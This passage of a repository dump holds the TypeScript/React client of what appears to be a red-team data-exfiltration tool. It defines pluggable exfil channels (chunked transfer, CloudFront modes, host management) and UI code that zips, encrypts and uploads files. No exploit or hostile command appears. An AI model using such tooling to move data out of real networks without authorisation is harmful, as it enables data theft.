| onChange: (config: ApiConfigResponse) => void; 42 | } 43 | 44 | export type ExfilDownloadFn = () => JSX.Element; 45 | export type ExfilUploadFn = (props: ExfilDownloadViewProps) => JSX.Element; 46 | export type ConfigFn = (props: ConfigViewProps) => JSX.Element; 47 | 48 | export interface ExfilExtension extends BasicInfoHolder { 49 | get capabilities(): ExfilProviderCapabilities[]; 50 | isPresent: () => boolean; 51 | getConfig: () => ApiConfigBaseExfil; 52 | 53 | get canDownloadSingle(): boolean; 54 | get canUploadSingle(): boolean; 55 | get canDownloadChunked(): boolean; 56 | get canUploadChunked(): boolean; 57 | get canAddHost(): boolean; 58 | get canRemoveHost(): boolean; 59 | 60 | // Custom views, only effective if overridden & booleans set 61 | downloadSingleView: ExfilDownloadFn; 62 | uploadSingleView: ExfilUploadFn; 63 | downloadChunkedView: ExfilDownloadFn; 64 | uploadChunkedView: ExfilUploadFn; 65 | 66 | // Backend API calls analogous to server\src\extensions\exfil\provider.ts 67 | downloadSingle: ( 68 | id: string, 69 | reportEvent?: ReportEvent 70 | ) => Promise; 71 | uploadSingle: ( 72 | storage: string, 73 | data: ArrayBuffer, 74 | reportEvent?: ReportEvent 75 | ) => Promise; 76 | downloadChunked: ( 77 | id: string, 78 | reportEvent?: ReportEvent 79 | ) => Promise; 80 | uploadChunked: ( 81 | storage: string, 82 | data: ArrayBuffer, 83 | reportEvent?: ReportEvent 84 | ) => Promise; 85 | addHost: (reportEvent: ReportEvent) => Promise; 86 | removeHost: (host: string, reportEvent: ReportEvent) => Promise; 87 | } 88 | 89 | export abstract class BaseExfilExtension implements ExfilExtension { 90 | protected api: Api; 91 | protected config: ApiConfigResponse; 92 | 93 | public constructor(api: Api, config: ApiConfigResponse) { 94 | this.api = api; 95 | this.config = config; 96 | } 97 | 98 | abstract get downloadSingleView(): ExfilDownloadFn; 99 | abstract get uploadSingleView(): ExfilUploadFn; 100 | abstract get downloadChunkedView(): ExfilDownloadFn; 101 | abstract get uploadChunkedView(): ExfilUploadFn; 102 | abstract get configView(): ConfigFn; 103 | 104 | abstract get capabilities(): ExfilProviderCapabilities[]; 105 | 106 | get canDownloadSingle(): boolean { 107 | return this.capabilities.indexOf('DownloadSingle') !== -1; 108 | } 109 | get canUploadSingle(): boolean { 110 | return this.capabilities.indexOf('UploadSingle') !== -1; 111 | } 112 | get canDownloadChunked(): boolean { 113 | return this.capabilities.indexOf('DownloadChunked') !== -1; 114 | } 115 | get canUploadChunked(): boolean { 116 | return this.capabilities.indexOf('UploadChunked') !== -1; 117 | } 118 | get canAddHost(): boolean { 119 | return this.capabilities.indexOf('AddHost') !== -1; 120 | } 121 | get canRemoveHost(): boolean { 122 | return this.capabilities.indexOf('RemoveHost') !== -1; 123 | } 124 | 125 | get isConfigurable(): boolean { 126 | return this.canAddHost || this.canRemoveHost; 127 | } 128 | 129 | abstract isPresent(): boolean; 130 | abstract getConfig(): ApiConfigBaseExfil; 131 | 132 | abstract downloadSingle( 133 | id: string, 134 | reportEvent?: ReportEvent | undefined 135 | ): Promise; 136 | abstract uploadSingle( 137 | storage: string, 138 | data: ArrayBuffer, 139 | reportEvent?: ReportEvent | undefined 140 | ): Promise; 141 | abstract downloadChunked( 142 | id: string, 143 | reportEvent?: ReportEvent | undefined 144 | ): Promise; 145 | abstract uploadChunked( 146 | storage: string, 147 | data: ArrayBuffer, 148 | reportEvent?: ReportEvent | undefined 149 | ): Promise; 150 | 151 | abstract addHost(reportEvent: ReportEvent): Promise; 152 | abstract removeHost(host: string, reportEvent: ReportEvent): Promise; 153 | 154 | abstract get name(): string; 155 | abstract get displayName(): string; 156 | abstract get description(): string; 157 | } -------------------------------------------------------------------------------- /client/src/components/extensions/storage/AwsS3.tsx: -------------------------------------------------------------------------------- 1 | import { ApiConfigResponse } from '../../../utils/Api'; 2 | import { ConfigFn, StorageExtension } from '../Extension'; 3 | 4 | export class AwsS3 implements StorageExtension { 5 | get isConfigurable(): boolean { 6 | return false; 7 | } 8 | get name(): string { 9 | return 'awss3'; 10 | } 11 | get displayName(): string { 12 | return 'AWS S3 Bucket'; 13 | } 14 | get description(): string { 15 | return 'File storage on an AWS S3 bucket. Files are removed after a configurable amount of time.'; 16 | } 17 | 18 | isPresent(config: ApiConfigResponse): boolean { 19 | return ( 20 | config.storages.awss3 !== undefined && 21 | config.storages.awss3 !== null 22 | ); 23 | } 24 | get configView(): ConfigFn { 25 | throw new Error(`${this.name} is not configurable`); 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /client/src/components/extensions/storage/DummyStorage.tsx: -------------------------------------------------------------------------------- 1 | import { ApiConfigResponse } from '../../../utils/Api'; 2 | import { ConfigFn, ConfigViewProps, StorageExtension } from '../Extension'; 3 | 4 | export class DummyStorage implements StorageExtension { 5 | get isConfigurable(): boolean { 6 | return true; 7 | } 8 | get name(): string { 9 | return 'dummystorage'; 10 | } 11 | get displayName(): string { 12 | return 'Dummy Storage'; 13 | } 14 | get description(): string { 15 | return "Non-functional dummy storage. This won't do anything and is only used for testing the frontend. It offers all capabilities Volatile Vault provides to storage extensions."; 16 | } 17 | 18 | isPresent(config: ApiConfigResponse): boolean { 19 | return true; 20 | } 21 | get configView(): ConfigFn { 22 | return (props: ConfigViewProps) => <>Dummy config view; 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /client/src/components/extensions/storage/FileSystem.tsx: -------------------------------------------------------------------------------- 1 | import { ApiConfigResponse } from '../../../utils/Api'; 2 | import { ConfigFn, StorageExtension } from '../Extension'; 3 | 4 | export class FileSystem implements StorageExtension { 5 | get isConfigurable(): boolean { 6 | return false; 7 | } 8 | get name(): string { 9 | return 'filesystem'; 10 | } 11 | get displayName(): string { 12 | return 'Built-in Filesystem'; 13 | } 14 | get description(): string { 15 | return 'File storage in the backed server. Files are removed after a configurable amount of time.'; 16 | } 17 | 18 | isPresent(config: ApiConfigResponse): boolean { 19 | return ( 20 | config.storages.filesystem !== undefined && 21 | config.storages.filesystem !== null 22 | ); 23 | } 24 | get configView(): ConfigFn { 25 | throw new Error(`${this.name} is not configurable`); 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /client/src/components/ui/CustomSteps.tsx: -------------------------------------------------------------------------------- 1 | import { StepIconProps } from '@mui/material/StepIcon'; 2 | import { Box, StepLabel, StepLabelProps, Typography } from '@mui/material'; 3 | 4 | const CustomStepIcon = (props: StepIconProps & { stepNumber: number }) => { 5 | const { active, completed, stepNumber } = props; 6 | 7 | return ( 8 | 20 | {stepNumber} 21 | 22 | ); 23 | }; 24 | 25 | const CustomStepLabel = (props: StepLabelProps & { stepNumber: number }) => { 26 | const { stepNumber, children, ...stepLabelProps } = props; 27 | 28 | return ( 29 | } 31 | {...stepLabelProps} 32 | > 33 | {children} 34 | 35 | ); 36 | }; 37 | 38 | export default CustomStepLabel; -------------------------------------------------------------------------------- /client/src/components/ui/EventTable.tsx: -------------------------------------------------------------------------------- 1 | import { 2 | TableRow, 3 | TableCell, 4 | TableContainer, 5 | Paper, 6 | Table, 7 | TableHead, 8 | TableBody, 9 | } from '@mui/material'; 10 | import { createRef, useEffect } from 'react'; 11 | import { useTheme } from '@mui/material'; 12 | 13 | interface EventTableProps { 14 | entries: EventEntry[]; 15 | } 16 | export interface EventEntry { 17 | timestamp: Date; 18 | category: string; 19 | content: string; 20 | variant: 'error' | 'success' | undefined; 21 | } 22 | 23 | export function createLogEntry( 24 | category: string, 25 | content: string, 26 | variant?: 'error' | 'success' 27 | ): EventEntry { 28 | return { 29 | timestamp: new Date(Date.now()), 30 | category: category, 31 | content: content, 32 | variant: variant, 33 | }; 34 | } 35 | 36 | export default function EventTable({ entries }: EventTableProps) { 37 | const summaryRef = createRef(); 38 | 39 | useEffect( 40 | () => summaryRef.current?.scrollIntoView({ behavior: 'smooth' }), 41 | [entries] 42 | ); 43 | 44 | const theme = useTheme(); 45 | 46 | const createRow = (entry: EventEntry, idx: number) => { 47 | const backgroundColor = entry.variant 48 | ? entry.variant == 'success' 49 | ? theme.palette.success.main 50 | : theme.palette.error.main 51 | : undefined; 52 | const color = entry.variant 53 | ? theme.palette.getContrastText(backgroundColor as string) 54 | : theme.palette.text.primary; 55 | return ( 56 | 57 | 58 | {entry.timestamp.toISOString().split('T')[1].split('.')[0]} 59 | 60 | {entry.category} 61 | {entry.content} 62 | 63 | ); 64 | }; 65 | 66 | return ( 67 | <> 68 | 69 | 70 | 71 | 72 | Timestamp 73 | Category 74 | Details 75 | 76 | 77 | 78 | {entries.map(createRow)} 79 | 80 | 81 |
82 |
83 | 84 | ); 85 | } 86 | -------------------------------------------------------------------------------- /client/src/components/ui/GenericHttpDownload.tsx: -------------------------------------------------------------------------------- 1 | import React, { useEffect, useState } from 'react'; 2 | import EnterPassword from '../EnterPassword'; 3 | import { 4 | Box, 5 | Button, 6 | Paper, 7 | Stack, 8 | Table, 9 | TableBody, 10 | TableCell, 11 | TableContainer, 12 | TableHead, 13 | TableRow, 14 | TextField, 15 | Typography, 16 | } from '@mui/material'; 17 | import { enqueueSnackbar } from 'notistack'; 18 | import { formatSize } from '../../utils/Files'; 19 | import { decryptSymmetric } from '../../utils/Crypto'; 20 | import DownloadIcon from '@mui/icons-material/Download'; 21 | import { saveAs } from 'file-saver'; 22 | import jszip from 'jszip'; 23 | import moment from 'moment'; 24 | import { ExfilExtension } from '../extensions/Extension'; 25 | import { SelectedMode } from '../ModeSelector'; 26 | import EventTable, { createLogEntry, EventEntry } from './EventTable'; 27 | 28 | interface DownloadBlobProps { 29 | exfil: ExfilExtension; 30 | mode: SelectedMode; 31 | enabled?: boolean; 32 | onDownloaded: (id: string, blob: ArrayBuffer) => void; 33 | onExfilEvent: ( 34 | category: string, 35 | content: string, 36 | variant?: 'error' | 'success' 37 | ) => void; 38 | } 39 | 40 | function DownloadBlob({ 41 | exfil, 42 | mode, 43 | enabled = true, 44 | onDownloaded, 45 | onExfilEvent, 46 | }: DownloadBlobProps) { 47 | const [id, setId] = useState(''); 48 | const [canDownload, setCanDownload] = useState(false); 49 | const [canEdit, setCanEdit] = useState(true); 50 | const [downloadError, setDownloadError] = useState(''); 51 | 52 | const onIdChange = ( 53 | event: React.ChangeEvent 54 | ) => { 55 | setCanDownload(true); 56 | setDownloadError(''); 57 | setId(event.currentTarget.value); 58 | }; 59 | 60 | const onDownload = async () => { 61 | setCanDownload(false); 62 | setCanEdit(false); 63 | setDownloadError(''); 64 | try { 65 | //TODO: add EventTable! 66 | const res = 67 | mode == 'DownloadSingle' 68 | ? await exfil.downloadSingle(id, onExfilEvent) 69 | : await exfil.downloadChunked(id, onExfilEvent); 70 | 71 | enqueueSnackbar({ 72 | message: `Downloaded ${formatSize(res.data.byteLength)} of data!`, 73 | variant: 'success', 74 | }); 75 | onDownloaded(id, res.data); 76 | } catch (err) { 77 | enqueueSnackbar({ 78 | message: `Download failed: ${err}`, 79 | variant: 'error', 80 | }); 81 | setDownloadError('Download error'); 82 | setTimeout(() => { 83 | setCanDownload(true); 84 | setCanEdit(true); 85 | }, 3000); 86 | } 87 | }; 88 | 89 | return ( 90 | <> 91 | 92 | Download ID 93 | 94 | 95 | 104 | 111 | 112 | 113 | ); 114 | } 115 | 116 | interface DownloadProps { 117 | exfil: ExfilExtension; 118 | mode: SelectedMode; 119 | } 120 | 121 | export default function GenericHttpDownload({ exfil, mode }: DownloadProps) { 122 | interface FileInfo { 123 | name: string; 124 | date: Date; 125 | } 126 | const [id, setId] = useState(''); 127 | const [blob, setBlob] = useState(null); 128 | const [password, setPassword] = useState(''); 129 | const [canDecrypt, setCanDecrypt] = useState(true); 130 | const [isDecrypted, setIsDecrypted] = useState(false); 131 | const [files, setFiles] = useState([]); 132 | var [entries, setEntries] = useState([]); 133 | 134 | if (mode != 'DownloadChunked' && mode != 'DownloadSingle') 135 | throw new Error(`Unsupported mode ${mode}`); 136 | 137 | const doDecrypt = () => { 138 | setCanDecrypt(false); 139 | 140 | if (!blob) 141 | return enqueueSnackbar({ 142 | message: 'Downloaded data uninitialized', 143 | variant: 'error', 144 | }); 145 | if (blob.byteLength < 13) 146 | return enqueueSnackbar({ 147 | message: `Downloaded data insufficient (${blob.byteLength} bytes)`, 148 | variant: 'error', 149 | }); 150 | 151 | decryptSymmetric(blob.slice(12), blob.slice(0, 12), password) 152 | .then((res) => { 153 | setBlob(res); 154 | setIsDecrypted(true); 155 | enqueueSnackbar({ 156 | message: 'Successfully decrypted the data!', 157 | variant: 'success', 158 | }); 159 | }) 160 | .catch((err) => { 161 | enqueueSnackbar({ 162 | message: `Error decrypting data: ${ 163 | err?.message ?? 'General failure' 164 | }`, 165 | variant: 'error', 166 | }); 167 | setCanDecrypt(true); 168 | }); 169 | }; 170 | 171 | useEffect(() => { 172 | if (!isDecrypted) return; 173 | const zip = jszip(); 174 | zip.loadAsync(blob as ArrayBuffer).then((_zip) => { 175 | setFiles( 176 | Object.keys(_zip.files).map((name) => { 177 | return { name: name, date: _zip.files[name].date }; 178 | }) 179 | ); 180 | }); 181 | }, [isDecrypted]); 182 | 183 | const save = () => { 184 | saveAs(new Blob([blob as ArrayBuffer]), `${id}.zip`); 185 | }; 186 | 187 | const addEntry = ( 188 | category: string, 189 | content: string, 190 | variant?: 'error' | 'success' 191 | ) => { 192 | entries = [...entries, createLogEntry(category, content, variant)]; 193 | setEntries(entries); 194 | }; 195 | 196 | return ( 197 | 198 | { 202 | setBlob(blob); 203 | setId(id); 204 | }} 205 | enabled={blob == null} 206 | onExfilEvent={addEntry} 207 | /> 208 | 213 | 220 | 221 | 222 | 223 | Contents 224 | 225 | 226 | 227 | 228 | 229 | 230 | Name 231 | Date 232 | 233 | 234 | 235 | {files.map((f, i) => ( 236 | 237 | {f.name} 238 | 239 | {moment(f.date).format('YYYY MM DD - HH:mm:ss')} 240 | 241 | 242 | ))} 243 | 244 |
245 |
246 | 247 | 256 | 257 | 258 | 259 | Log 260 | 261 | 262 | 263 |
264 | ); 265 | } 266 | -------------------------------------------------------------------------------- /client/src/components/ui/GenericHttpUpload.tsx: -------------------------------------------------------------------------------- 1 | import { 2 | TableContainer, 3 | Paper, 4 | Table, 5 | TableHead, 6 | TableRow, 7 | TableCell, 8 | TableBody, 9 | IconButton, 10 | Typography, 11 | useTheme, 12 | Button, 13 | Stepper, 14 | Step, 15 | StepLabel, 16 | Grid, 17 | Box, 18 | Stack, 19 | Alert, 20 | AlertTitle, 21 | } from '@mui/material'; 22 | import React, { createRef, useEffect, useMemo, useState } from 'react'; 23 | import { useDropzone } from 'react-dropzone'; 24 | import DeleteIcon from '@mui/icons-material/Delete'; 25 | import CheckIcon from '@mui/icons-material/Check'; 26 | import jszip from 'jszip'; 27 | import { encryptSymmetric } from '../../utils/Crypto'; 28 | import { enqueueSnackbar } from 'notistack'; 29 | import moment from 'moment'; 30 | import EnterPassword from '../EnterPassword'; 31 | import { calcSize, formatSize } from '../../utils/Files'; 32 | import { fromArrayBuffer } from '../../utils/Entropy'; 33 | import { ExfilExtension, StorageExtension } from '../extensions/Extension'; 34 | import EventTable, { createLogEntry, EventEntry } from './EventTable'; 35 | import { SelectedMode } from '../ModeSelector'; 36 | 37 | interface FileSelectionProps { 38 | onFilesSelected: (files: File[]) => void; 39 | } 40 | 41 | function FileSelection({ onFilesSelected }: FileSelectionProps) { 42 | const baseStyle = { 43 | flex: 1, 44 | display: 'flex', 45 | flexDirection: 'column' as const, 46 | alignItems: 'center', 47 | padding: '20px', 48 | borderWidth: 2, 49 | borderRadius: 8, 50 | borderColor: '#bbb', 51 | borderStyle: 'dashed', 52 | color: '#bdbdbd', 53 | outline: 'none', 54 | transition: 'border .24s ease-in-out', 55 | margin: '20px', 56 | }; 57 | 58 | const focusedStyle = { 59 | borderColor: '#2196f3', 60 | }; 61 | 62 | const acceptStyle = { 63 | borderColor: '#00e676', 64 | }; 65 | 66 | const rejectStyle = { 67 | borderColor: '#ff1744', 68 | }; 69 | 70 | const [selectedFiles, setSelectedFiles] = useState([]); 71 | const [entropies, setEntropies] = useState<{ [key: string]: number }>({}); 72 | 73 | const { 74 | acceptedFiles, 75 | getRootProps, 76 | getInputProps, 77 | isFocused, 78 | isDragAccept, 79 | isDragReject, 80 | } = useDropzone(); 81 | 82 | const style = useMemo( 83 | () => ({ 84 | ...baseStyle, 85 | ...(isFocused ? focusedStyle : {}), 86 | ...(isDragAccept ? acceptStyle : {}), 87 | ...(isDragReject ? rejectStyle : {}), 88 | }), 89 | [isFocused, isDragAccept, isDragReject] 90 | ); 91 | 92 | const summaryRef = createRef(); 93 | 94 | useEffect(() => { 95 | // Remove duplicates 96 | setSelectedFiles( 97 | selectedFiles 98 | .concat(acceptedFiles) 99 | .filter( 100 | (f, i, a) => 101 | i == a.length - 1 || 102 | a.slice(i + 1).findIndex((_f) => _f.name == f.name) === -1 103 | ) 104 | ); 105 | }, [acceptedFiles]); 106 | 107 | useEffect(() => { 108 | const updateEntropies = async () => { 109 | const res = await Promise.all( 110 | selectedFiles.map(async (file) => { 111 | if (Object.keys(entropies).findIndex((k) => k == file.name) === -1) { 112 | const data = await file.arrayBuffer(); 113 | entropies[file.name] = fromArrayBuffer(data); 114 | setEntropies({ ...entropies }); 115 | } 116 | return entropies; 117 | }) 118 | ); 119 | 120 | // Remove entries of files that were removed already 121 | if (res.length) 122 | setEntropies( 123 | Object.keys(res[res.length - 1]).reduce((res, key) => { 124 | if (selectedFiles.findIndex((f) => f.name == key) !== -1) 125 | res[key] = entropies[key]; 126 | return res; 127 | }, {} as { [key: string]: number }) 128 | ); 129 | }; 130 | 131 | updateEntropies(); 132 | }, [selectedFiles]); 133 | 134 | useEffect(() => { 135 | summaryRef?.current?.scrollIntoView({ behavior: 'smooth' }); 136 | onFilesSelected(selectedFiles); 137 | }, [selectedFiles]); 138 | 139 | const handleRemove = (file: File) => { 140 | setSelectedFiles(selectedFiles.filter((f) => f != file)); 141 | }; 142 | 143 | const fileRows = selectedFiles.map((file) => ( 144 | 148 | 149 | {file.name} 150 | 151 | 152 | {Object.keys(entropies).findIndex((k) => k == file.name) !== -1 153 | ? entropies[file.name].toFixed(2) 154 | : 'n/a'} 155 | 156 | {formatSize(file.size)} 157 | 158 | handleRemove(file)} 162 | > 163 | 164 | 165 | 166 | 167 | )); 168 | 169 | const theme = useTheme(); 170 | 171 | // Add Ref for scrolling 172 | fileRows.push(); 173 | 174 | return ( 175 | <> 176 | 177 | Files 178 | 179 |
180 | 181 |

Drag 'n' drop some files here, or click to select files

182 |
183 | 184 | 185 | 186 | 187 | Name 188 | 189 | Entropy 190 | 191 | 192 | Size 193 | 194 | 195 | Action 196 | 197 | 198 | 199 | {selectedFiles && fileRows} 200 |
201 |
202 | 203 | 204 | {`Total: ${selectedFiles.length} files`} 205 | 206 | 207 | Size: {formatSize(calcSize(selectedFiles))} 208 | 209 | 210 | 211 | 219 | 220 | 221 | 222 | 223 | ); 224 | } 225 | 226 | interface DataInputProps { 227 | onFinished: (files: File[], password: string) => void; 228 | maxFileSize?: number; 229 | } 230 | 231 | function DataInput({ onFinished, maxFileSize }: DataInputProps) { 232 | const [files, setFiles] = useState([]); 233 | const [password, setPassword] = useState(''); 234 | 235 | const size = calcSize(files); 236 | 237 | return ( 238 | 239 | 240 | 241 | {maxFileSize && calcSize(files) > maxFileSize && ( 242 | 243 | Maximum file size A maximum of 244 | {formatSize(maxFileSize)} can be uploaded. The selected files will be 245 | compressed in the next step, however it may be ineffective when 246 | handling high-entropy data. You may want to consider selecting fewer 247 | files for this upload. 248 | 249 | )} 250 | 251 | 261 | 262 | 263 | ); 264 | } 265 | 266 | interface UploadInfo { 267 | id: string; 268 | lifeTime: number; 269 | } 270 | 271 | interface ProcessUploadProps { 272 | files: File[]; 273 | password: string; 274 | exfil: ExfilExtension; 275 | mode: SelectedMode; 276 | storage: StorageExtension; 277 | onFinished: (info: UploadInfo) => void; 278 | maxFileSize?: number; 279 | } 280 | 281 | function ProcessUpload({ 282 | files, 283 | password, 284 | exfil, 285 | mode, 286 | storage, 287 | onFinished, 288 | maxFileSize, 289 | }: ProcessUploadProps) { 290 | var [entries, setEntries] = useState([]); 291 | 292 | const [encData, setEncData] = useState(null); 293 | const [encIv, setEncIv] = useState(null); 294 | 295 | const addEntry = ( 296 | category: string, 297 | content: string, 298 | variant?: 'error' | 'success' 299 | ) => { 300 | entries = [...entries, createLogEntry(category, content, variant)]; 301 | setEntries(entries); 302 | }; 303 | 304 | useEffect(() => { 305 | const processFiles = async () => { 306 | const zipFile = jszip(); 307 | addEntry('Compression', 'Starting...'); 308 | await Promise.all( 309 | files.map(async (file) => { 310 | const data = await file.arrayBuffer(); 311 | zipFile.file(file.name, data, { date: new Date(file.lastModified) }); 312 | }) 313 | ); 314 | var lastFile = ''; 315 | var blob = await zipFile.generateAsync( 316 | { 317 | type: 'arraybuffer', 318 | compression: 'DEFLATE', 319 | compressionOptions: { level: 9 }, 320 | }, 321 | (meta) => { 322 | if (meta.currentFile && lastFile != meta.currentFile) { 323 | addEntry( 324 | 'Compression', 325 | `Processing "${meta.currentFile}" (${meta.percent.toFixed( 326 | Math.max(0, files.length.toString().length - 3) 327 | )}%)` 328 | ); 329 | lastFile = meta.currentFile; 330 | } 331 | } 332 | ); 333 | addEntry( 334 | 'Compression', 335 | `Done: compressed ${formatSize(calcSize(files))} to ${formatSize( 336 | blob.byteLength 337 | )} (entropy: ${fromArrayBuffer(blob).toFixed(2)})`, 338 | 'success' 339 | ); 340 | addEntry('Encryption', 'Starting...'); 341 | const [cipher, iv] = await encryptSymmetric(blob, password); 342 | addEntry( 343 | 'Encryption', 344 | `Done: ${formatSize(cipher.byteLength)} (entropy: ${fromArrayBuffer( 345 | cipher 346 | ).toFixed(2)})`, 347 | 'success' 348 | ); 349 | setEncData(cipher); 350 | setEncIv(iv); 351 | }; 352 | 353 | processFiles().catch((err) => { 354 | enqueueSnackbar({ 355 | message: `Processing failed: ${err?.message ?? JSON.stringify(err)}`, 356 | variant: 'error', 357 | }); 358 | addEntry('ERROR', err?.message ?? JSON.stringify(err), 'error'); 359 | }); 360 | }, []); 361 | 362 | useEffect(() => { 363 | if (!encData || !encIv) return; 364 | const performUpload = async () => { 365 | const data = encData as ArrayBuffer; 366 | const iv = encIv as ArrayBuffer; 367 | var tmp = new Uint8Array(data.byteLength + iv.byteLength); 368 | tmp.set(new Uint8Array(iv), 0); 369 | tmp.set(new Uint8Array(data), iv.byteLength); 370 | 371 | if (maxFileSize && tmp.byteLength > maxFileSize) { 372 | throw new Error( 373 | `File size ${formatSize( 374 | tmp.byteLength 375 | )} exceeds the allowed maximum of ${formatSize( 376 | maxFileSize 377 | )}; aborting.` 378 | ); 379 | } 380 | 381 | addEntry('Upload', 'Starting...'); 382 | const res = 383 | mode == 'UploadSingle' 384 | ? await exfil.uploadSingle(storage.name, tmp, addEntry) 385 | : await exfil.uploadChunked(storage.name, tmp, addEntry); 386 | addEntry('Upload', 'Done!', 'success'); 387 | enqueueSnackbar({ 388 | message: 'Upload finished!', 389 | variant: 'success', 390 | }); 391 | onFinished({ 392 | id: res.id as string, 393 | lifeTime: res.lifeTime as number, 394 | }); 395 | }; 396 | 397 | performUpload().catch((err) => { 398 | enqueueSnackbar({ 399 | message: `Upload failed: ${err?.message ?? JSON.stringify(err)}`, 400 | variant: 'error', 401 | }); 402 | addEntry('ERROR', err?.message ?? JSON.stringify(err), 'error'); 403 | }); 404 | }, [encData, encIv]); 405 | 406 | return ( 407 | <> 408 | 409 | 410 | ); 411 | } 412 | 413 | interface UploadInfoElementProps { 414 | info: UploadInfo; 415 | } 416 | 417 | function UploadInfoElement({ info }: UploadInfoElementProps) { 418 | const [remaining, setRemaining] = useState('00:00:00'); 419 | const [ownNowDate, _] = useState(moment()); 420 | 421 | useEffect(() => { 422 | const timer = setInterval(() => { 423 | const ownExpiryDate = moment(ownNowDate).add(info.lifeTime, 'ms'); 424 | const timeLeft = moment.duration(ownExpiryDate.diff(moment())); 425 | setRemaining(moment.utc(timeLeft.asMilliseconds()).format('HH:mm:ss')); 426 | }, 500); 427 | return () => clearInterval(timer); 428 | }, []); 429 | 430 | return ( 431 | <> 432 | 433 | 434 | Files successfully uploaded! 435 | Your download ID is {info.id}. Please note it down as it won't 436 | be shown to you again. 437 |
438 | The uploaded data will be removed in {remaining} without any further 439 | notice. 440 |
441 |
442 | 443 | ); 444 | } 445 | 446 | interface UploadProps { 447 | exfil: ExfilExtension; 448 | mode: SelectedMode; 449 | storage: StorageExtension; 450 | } 451 | 452 | export default function GenericHttpUpload({ 453 | exfil, 454 | storage, 455 | mode, 456 | }: UploadProps) { 457 | const [files, setFiles] = useState([]); 458 | const [password, setPassword] = useState(''); 459 | const [step, setStep] = useState(0); 460 | const [uploadInfo, setUploadInfo] = useState(null); 461 | 462 | if (mode != 'UploadChunked' && mode != 'UploadSingle') 463 | throw new Error(`Unsupported mode ${mode}`); 464 | 465 | const steps = ['Data Input', 'Process & Upload', 'Done']; 466 | 467 | const maxSize = exfil.getConfig().max_total_size; 468 | 469 | const getCurrentStepView = () => { 470 | switch (step) { 471 | case 0: 472 | return ( 473 | { 475 | setFiles(_files); 476 | setPassword(_password); 477 | setStep(1); 478 | }} 479 | maxFileSize={maxSize} 480 | /> 481 | ); 482 | case 1: 483 | case 2: 484 | return ( 485 | <> 486 | { 492 | setUploadInfo(info); 493 | setStep(2); 494 | }} 495 | maxFileSize={maxSize} 496 | mode={mode} 497 | /> 498 | {step == 2 && uploadInfo != null && ( 499 | 500 | )} 501 | 502 | ); 503 | default: 504 | return <>; 505 | } 506 | }; 507 | 508 | return ( 509 | <> 510 | 511 | {steps.map((label, index) => { 512 | const stepProps: { completed?: boolean } = {}; 513 | const labelProps: { 514 | optional?: React.ReactNode; 515 | } = {}; 516 | return ( 517 | 518 | {label} 519 | 520 | ); 521 | })} 522 | 523 | {getCurrentStepView()} 524 | 525 | ); 526 | } 527 | -------------------------------------------------------------------------------- /client/src/index.tsx: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import ReactDOM from 'react-dom/client'; 3 | import App from './App'; 4 | 5 | const root = ReactDOM.createRoot( 6 | document.getElementById('root') as HTMLElement 7 | ); 8 | root.render( 9 | // 10 | 11 | // 12 | ); 13 | -------------------------------------------------------------------------------- /client/src/logo.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /client/src/react-app-env.d.ts: -------------------------------------------------------------------------------- 1 | /// 2 | -------------------------------------------------------------------------------- /client/src/utils/Api.ts: -------------------------------------------------------------------------------- 1 | import axios from 'axios'; 2 | import Config from './Config'; 3 | 4 | export interface ApiResponse { 5 | success: boolean; 6 | message: string; 7 | } 8 | 9 | export interface ApiGetAuthResponse extends ApiResponse {} 10 | 11 | export interface ApiAuthResponse extends ApiResponse { 12 | token?: string; 13 | } 14 | 15 | export interface ApiUploadResponse extends ApiResponse { 16 | id?: string; 17 | lifeTime?: number; 18 | } 19 | 20 | export interface ApiDownloadResponse extends ApiResponse { 21 | data: ArrayBuffer; 22 | } 23 | 24 | export interface ApiConfigResponse extends ApiResponse { 25 | storages: ApiConfigStorageCollection; 26 | exfils: ApiConfigExfilsCollection; 27 | } 28 | 29 | export interface ApiConfigExfilsCollection { 30 | basichttp?: ApiConfigItem; 31 | awscloudfront?: ApiConfigItem; 32 | } 33 | 34 | export interface ApiConfigBaseExfil { 35 | max_total_size?: number; 36 | chunk_size?: number; 37 | } 38 | 39 | export interface ApiConfigBasicHTTPExfil extends ApiConfigBaseExfil { 40 | hosts: string[]; 41 | } 42 | 43 | export type AwsCloudFrontTransferMode = 'Dynamic' | 'Static'; 44 | 45 | export interface AwsCloudFrontTransferConfig { 46 | mode: AwsCloudFrontTransferMode; 47 | hosts?: string[]; 48 | } 49 | 50 | export interface ApiConfigAwsCloudFrontExfil extends ApiConfigBaseExfil { 51 | upload: AwsCloudFrontTransferConfig; 52 | download: AwsCloudFrontTransferConfig; 53 | } 54 | 55 | export interface ApiConfigStorageCollection { 56 | filesystem?: ApiConfigItem; 57 | awss3?: ApiConfigItem; 58 | } 59 | 60 | export interface ApiConfigBaseStorage { 61 | max_size: number; 62 | file_expiry: number; 63 | } 64 | 65 | export interface ApiConfigItem { 66 | name: string; 67 | displayName: string; 68 | info?: T; 69 | } 70 | 71 | export default class Api { 72 | public token?: string = undefined; 73 | public static BASE_URL: string = Config.BASE_URL; 74 | 75 | public static fail_from_error( 76 | error: any, 77 | defaultMessage: string = 'Failure' 78 | ): ApiResponse { 79 | return { 80 | success: false, 81 | message: error?.response?.data?.message ?? defaultMessage, 82 | }; 83 | } 84 | 85 | public static success_from_data(data: any): ApiResponse { 86 | return { ...data, success: true }; 87 | } 88 | 89 | public async isAuthenticated(): Promise { 90 | try { 91 | type Obj = { [key: string]: string }; 92 | var headers: Obj = {}; 93 | if (this.token) headers['Authorization'] = `Bearer ${this.token}`; 94 | 95 | const res = await axios.get(Api.BASE_URL + '/api/auth', { 96 | headers: headers, 97 | }); 98 | 99 | return Api.success_from_data(res.data) as ApiGetAuthResponse; 100 | } catch (error) { 101 | return Promise.reject( 102 | Api.fail_from_error(error, 'Unauthorized') 103 | ); 104 | } 105 | } 106 | 107 | public async authenticate(code: string): Promise { 108 | try { 109 | type Obj = { [key: string]: string }; 110 | var headers: Obj = {}; 111 | headers['content-type'] = 'application/json'; 112 | if (this.token) headers['Authorization'] = `Bearer ${this.token}`; 113 | 114 | const res = await axios.post( 115 | Api.BASE_URL + '/api/auth', 116 | { totp: code }, 117 | { headers: { 'content-type': 'application/json' } } 118 | ); 119 | 120 | if (!res.data?.token) 121 | return Promise.reject( 122 | Api.fail_from_error(undefined, 'Failed to receive JWT') 123 | ); 124 | 125 | this.token = res.data.token; 126 | return 